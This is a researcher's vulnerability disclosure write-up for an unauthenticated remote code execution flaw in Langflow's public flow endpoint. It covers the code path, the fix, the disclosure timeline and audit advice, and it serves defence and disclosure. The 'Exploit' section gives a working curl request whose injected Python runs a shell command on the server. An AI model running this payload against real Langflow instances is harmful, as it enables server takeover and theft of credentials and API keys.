In early 2025, CISA added CVE-2025-3248 to its Known Exploited Vulnerabilities catalog. It was an unauthenticated remote code execution bug in Langflow, the popular open-source AI workflow builder with over 146,000 GitHub stars. The vulnerability was simple: the /api/v1/validate/code endpoint accepted arbitrary Python code and passed it to exec() without requiring authentication. Botnets were actively exploiting it. The fix was straightforward too: the Langflow team added an authentication check to the endpoint and moved on.
I found the same class of vulnerability on a different endpoint. Same codebase. Same exec() call at the end of the chain. Same zero sandboxing. But this time, the fix isn't as simple as slapping an auth decorator on it, because the vulnerable endpoint is supposed to be unauthenticated. That's what makes this one interesting.
The Target
Langflow lets you build AI workflows visually by dragging and dropping components into a canvas. You wire them together, and Langflow executes the resulting pipeline. It's the kind of tool that teams deploy to let non-engineers build chatbots, RAG pipelines, and agent workflows without writing code.
A key feature is public flows. You build a workflow, mark it as public, and share a link. Anyone with the link can interact with it. No login required. This is how most Langflow-powered chatbots work in production: the end user visits a URL, chats with the bot, and the flow runs on the server behind the scenes.
For public flows to work, the endpoint that builds and executes them can't require authentication. That's by design. The problem is what else that endpoint accepts.
Finding the Bug
I was reading src/backend/base/langflow/api/v1/chat.py and comparing two endpoints side by side. At line 138, there's the authenticated build endpoint:
```python
@router.post("/build/{flow_id}/flow")
async def build_flow(
    *,
    flow_id: uuid.UUID,
    data: Annotated[FlowDataRequest | None, Body(embed=True)] = None,
    current_user: CurrentActiveUser,  # <-- AUTH REQUIRED
    ...
):
```
And at line 580, there's the public flow build endpoint:
```python
@router.post("/build_public_tmp/{flow_id}/flow")
async def build_public_tmp(
    *,
    flow_id: uuid.UUID,
    data: Annotated[FlowDataRequest | None, Body(embed=True)] = None,
    request: Request,
    # No current_user dependency. No auth at all.
):
```
Both endpoints accept an optional data parameter of type FlowDataRequest. Both pass it downstream to the same graph building pipeline. The authenticated endpoint requires a valid user session. The public one does not.
Here's the thing about that data parameter. When it's None, the endpoint loads the flow definition from the database: the flow that an authenticated user saved through the Langflow UI. Safe, expected behavior.
When data is provided, the endpoint uses the caller's flow definition instead. This is meant for the authenticated endpoint, where a logged-in user might want to test a modified version of their flow without saving it first. It's a convenience feature for the visual editor.
But the public endpoint accepts it too. And it doesn't require authentication. So an unauthenticated attacker can send a completely fabricated flow definition containing arbitrary Python code, and the server will build and execute it.
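The dispatch logic boils down to a single branch. Here is a minimal sketch of that decision (names like `resolve_flow_data` are my own illustrative stand-ins, not Langflow's actual API):

```python
from typing import Optional

def resolve_flow_data(stored_flow: dict, request_data: Optional[dict]) -> dict:
    """Return the flow definition the build pipeline will execute.

    When request_data is None, the stored (trusted) definition is used.
    When the caller supplies request_data, it wins -- which is exactly
    the hole on the unauthenticated public endpoint.
    """
    if request_data is None:
        return stored_flow   # trusted: saved by an authenticated user
    return request_data      # untrusted: whatever the caller sent

trusted = {"nodes": [{"id": "saved"}], "edges": []}
attacker = {"nodes": [{"id": "evil"}], "edges": []}

assert resolve_flow_data(trusted, None) == trusted
assert resolve_flow_data(trusted, attacker) == attacker
```

On the authenticated endpoint this branch is a legitimate convenience. On the public one, the second return path is the vulnerability.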
The Execution Chain
A Langflow flow definition is JSON. It contains nodes, and each node has a template with a code field. This code defines the component's behavior. Under normal operation, this code is written by authenticated users through the visual editor.
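To make the structure concrete, here is a stripped-down, illustrative view of where that code field sits inside a node (field names mirror the node JSON used later in this post; the values are fake):

```python
# Minimal sketch of a flow-definition node; only the fields relevant
# to code execution are shown, and the component source is benign.
node = {
    "id": "MyComponent-001",
    "type": "genericNode",
    "data": {
        "type": "MyComponent",
        "node": {
            "template": {
                "code": {
                    "type": "code",
                    # This string is what ultimately reaches exec() on the server.
                    "value": "class MyComponent:\n    display_name = 'X'",
                },
            },
        },
    },
}

# The build pipeline digs the component source out of the template:
source = node["data"]["node"]["template"]["code"]["value"]
print(source.splitlines()[0])   # class MyComponent:
```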
When the server builds a flow, it walks through each node and instantiates the component. Here's the chain:
The attacker's data arrives at `start_flow_build()` and flows into `generate_flow_events()`. From there:

1. `generate_flow_events()` calls `create_graph()`, which calls `build_graph_from_data()` with the raw payload.
2. `Graph.from_payload()` parses the attacker's nodes.
3. The graph builder iterates through them, calling `vertex.instantiate_component()` for each one, which calls `instantiate_class()`.
4. `instantiate_class()` extracts the code field from the node's template and passes it to `eval_custom_component_code()`, which calls `create_class()`, which calls `prepare_global_scope()`.
And in prepare_global_scope(), at line 397 of validate.py:
```python
exec(compiled_code, exec_globals)
```
No sandbox. No restrictions on imports. Full access to the Python runtime. The exec_globals dictionary is initialized from globals().copy(), meaning the executed code has access to everything the server process has access to.
There's a subtle detail that makes this worse. prepare_global_scope doesn't just execute class definitions and function definitions. It also executes ast.Assign nodes. That means a line like:
```python
_x = os.system("id")
```
...is an assignment, and it gets executed during the graph building phase. The attacker's code runs before the flow even "starts." There's no need for the flow to complete successfully. The damage is done during component instantiation.
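A minimal, self-contained demonstration of why this matters (this is not Langflow's code, just the underlying Python behavior): executing a component's source with exec() runs its top-level assignments immediately, before any class is ever instantiated.

```python
import ast

SIDE_EFFECTS = []

component_source = """
_x = record("ran during instantiation")   # an ast.Assign node

class HarmlessComponent:
    display_name = "X"
"""

tree = ast.parse(component_source)
# Module-level statements include both the assignment and the class def.
node_types = [type(n).__name__ for n in tree.body]

scope = {"record": SIDE_EFFECTS.append}   # stand-in for the server's globals
exec(compile(tree, "<component>", "exec"), scope)

print(node_types)     # ['Assign', 'ClassDef']
print(SIDE_EFFECTS)   # ['ran during instantiation'] -- ran at definition time
```

The assignment's side effect fires the moment the source is exec'd, which is exactly the graph-building phase described above.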
The Exploit
The exploit is a single HTTP POST request. No authentication headers. No API keys. Just a client_id cookie set to any arbitrary string and a JSON body containing a malicious flow definition:
```bash
curl -X POST "http://target:7860/api/v1/build_public_tmp/${FLOW_ID}/flow" \
  -H "Content-Type: application/json" \
  -b "client_id=attacker" \
  -d '{
    "data": {
      "nodes": [{
        "id": "Exploit-001",
        "type": "genericNode",
        "position": {"x": 0, "y": 0},
        "data": {
          "id": "Exploit-001",
          "type": "ExploitComp",
          "node": {
            "template": {
              "code": {
                "type": "code",
                "value": "import os\n_x = os.popen(\"id\").read()\nopen(\"/tmp/pwned\",\"w\").write(_x)\n\nfrom lfx.custom.custom_component.component import Component\nfrom lfx.io import Output\nfrom lfx.schema.data import Data\n\nclass ExploitComp(Component):\n    display_name=\"X\"\n    outputs=[Output(display_name=\"O\",name=\"o\",method=\"r\")]\n    def r(self)->Data:\n        return Data(data={})",
                "name": "code"
              },
              "_type": "Component"
            },
            "base_classes": ["Data"],
            "display_name": "ExploitComp"
          }
        }
      }],
      "edges": []
    }
  }'
```
Two seconds later, /tmp/pwned contains the output of id. Full RCE. No credentials.
The only prerequisite is knowing the UUID of a public flow on the target instance. In practice, these are discoverable through shared chatbot links. And when AUTO_LOGIN=true (which is the default), even that prerequisite disappears, because the attacker can call /api/v1/auto_login to get a superuser token and create a public flow themselves.
I tested this against Langflow 1.7.3, the latest stable release at the time. Six runs, six confirmed executions, 100% reproducibility.
Why This Is Not CVE-2025-3248
When I wrote the advisory, I knew the first question would be: "Isn't this the same bug that was already fixed?" It's not, but the distinction matters.
CVE-2025-3248 was in /api/v1/validate/code. That endpoint existed solely to validate Python code, and it had no authentication. The fix was simple: add Depends(get_current_active_user) to the endpoint. Done.
CVE-2026-33017 is in /api/v1/build_public_tmp/{flow_id}/flow. This endpoint is designed to be unauthenticated because it serves public flows. You can't just add an auth requirement without breaking the entire public flows feature. The real fix is removing the data parameter from the public endpoint entirely, so public flows can only execute their stored (server-side) flow data and never accept attacker-supplied definitions.
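In spirit, the fix looks something like the following sketch. To be clear, this is my simplified illustration of the approach, not the actual code from PR #12160; the function and parameter names are invented:

```python
from typing import Callable, Optional

def build_public_flow(flow_id: str,
                      client_data: Optional[dict],
                      load_stored_flow: Callable[[str], dict]) -> dict:
    """Public endpoint handler: never honor a caller-supplied definition.

    Public flows may only execute the server-side stored definition, so
    attacker-supplied `client_data` is never fed into the build pipeline.
    """
    # The fix in spirit: drop the untrusted parameter on the floor.
    return load_stored_flow(flow_id)

stored = {"nodes": ["trusted"], "edges": []}
result = build_public_flow("flow-123", {"nodes": ["evil"]}, lambda fid: stored)
assert result == stored
```

Contrast this with the authenticated endpoint, where honoring the caller's data is acceptable because the caller has already proven who they are.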
Same root cause pattern. Different endpoint. Different fix. And arguably a harder problem to solve, because the previous fix (adding auth) doesn't apply here.
The Pattern: Incomplete Fixes and Parallel Code Paths
This is a pattern I keep seeing across AI infrastructure projects. A vulnerability gets reported and fixed on one endpoint, but the same dangerous behavior exists on a parallel endpoint that nobody checked.
In Langflow's case, CVE-2025-3248 fixed /api/v1/validate/code by adding authentication. But nobody audited the other endpoints that also feed user input into exec(). The build_public_tmp endpoint had the same fundamental problem: untrusted code reaching exec() without a sandbox. The only difference was the path it took to get there.
This is why, when I audit a codebase, I start by looking at what was already fixed. The patches tell you what the developers consider a vulnerability. Then you search for the same pattern everywhere they didn't look. The authenticated build endpoint at line 138 and the public build endpoint at line 580 accept the exact same data parameter and feed it into the exact same pipeline. One requires auth. The other doesn't. That gap is the vulnerability.
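One way to do that search mechanically is to walk the AST of every file and flag direct calls to exec() or eval(). This is a quick audit helper of my own, not a Langflow tool, and it deliberately only catches direct calls (aliased or indirect ones need a real taint analysis):

```python
import ast

def find_dynamic_exec(source: str, filename: str = "<mem>") -> list[tuple[str, int]]:
    """Return (name, lineno) for every direct exec()/eval() call in source."""
    hits = []
    for node in ast.walk(ast.parse(source, filename)):
        if (isinstance(node, ast.Call)
                and isinstance(node.func, ast.Name)
                and node.func.id in {"exec", "eval"}):
            hits.append((node.func.id, node.lineno))
    return hits

sample = "def prepare_global_scope(code):\n    exec(compile(code, '<s>', 'exec'), {})\n"
print(find_dynamic_exec(sample))   # [('exec', 2)]
```

Run across a repo, this turns "nobody checked the other endpoints" into a finite worklist: every hit is a sink, and the remaining question is which routes can reach it with untrusted input.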
Impact
This is about as bad as it gets for a web application. An unauthenticated attacker sends a single HTTP request and gets arbitrary code execution with the full privileges of the server process. From there:
Every environment variable is readable. That includes API keys for OpenAI, Anthropic, and whatever other LLM providers are configured. It includes database credentials, cloud tokens, and internal service URLs.
Every file on the server is readable and writable. The attacker can exfiltrate the entire database, modify flow definitions to inject backdoors, or wipe everything.
Reverse shells are trivial. One line of Python in the exploit payload opens a persistent connection back to the attacker. From there, lateral movement into the rest of the network.
For context: the previous Langflow RCE (CVE-2025-3248) made it onto CISA's Known Exploited Vulnerabilities list and was actively used by botnets. This vulnerability is the same severity class on the same codebase.
The Disclosure
I reported this through Langflow's GitHub Security Advisory on February 25, 2026. The initial response took about two weeks and a couple of follow-up pings from my end. Once the team engaged, things moved quickly. They merged a fix in PR #12160, and the advisory was published on March 16, 2026.
There was a small hiccup in the process. After the fix was merged, the advisory was initially closed without being published. I explained why publication matters: no CVE assignment means no Dependabot alerts, no way for downstream projects to track the issue, and no public record of the fix. The Langflow team was receptive, reopened the advisory, and published it. The maintainer handling the advisory was upfront about the security process being new to them, and I appreciated that. Not every vendor is that responsive.
GitHub assigned CVE-2026-33017 on March 17, 2026, with a CVSS v4 score of 9.3 (Critical).
Timeline
| Date | Event |
|---|---|
| February 25, 2026 | Reported via GitHub Security Advisory |
| March 10, 2026 | Langflow team acknowledges the report |
| March 10, 2026 | Fix merged in PR #12160 |
| March 16, 2026 | Advisory published (GHSA-vwmf-pq79-vjvx) |
| March 17, 2026 | CVE-2026-33017 assigned |
Recommendations
If you're running Langflow, update immediately. The fix is in PR #12160. Any version up to and including 1.8.1 is affected.
If you're building AI infrastructure with user-facing endpoints, audit every code path that touches exec() or eval(). It's not enough to add authentication to one endpoint. You need to trace every route that untrusted input can take to reach code execution and either eliminate it or sandbox it properly.
And if you've fixed a vulnerability in your codebase before, go back and check whether the same pattern exists somewhere else. The first fix is rarely the last one needed.
References
- Advisory: GHSA-vwmf-pq79-vjvx
- CVE: CVE-2026-33017
- Fix: langflow-ai/langflow#12160
- Related: CVE-2025-3248 (previous Langflow RCE, CISA KEV)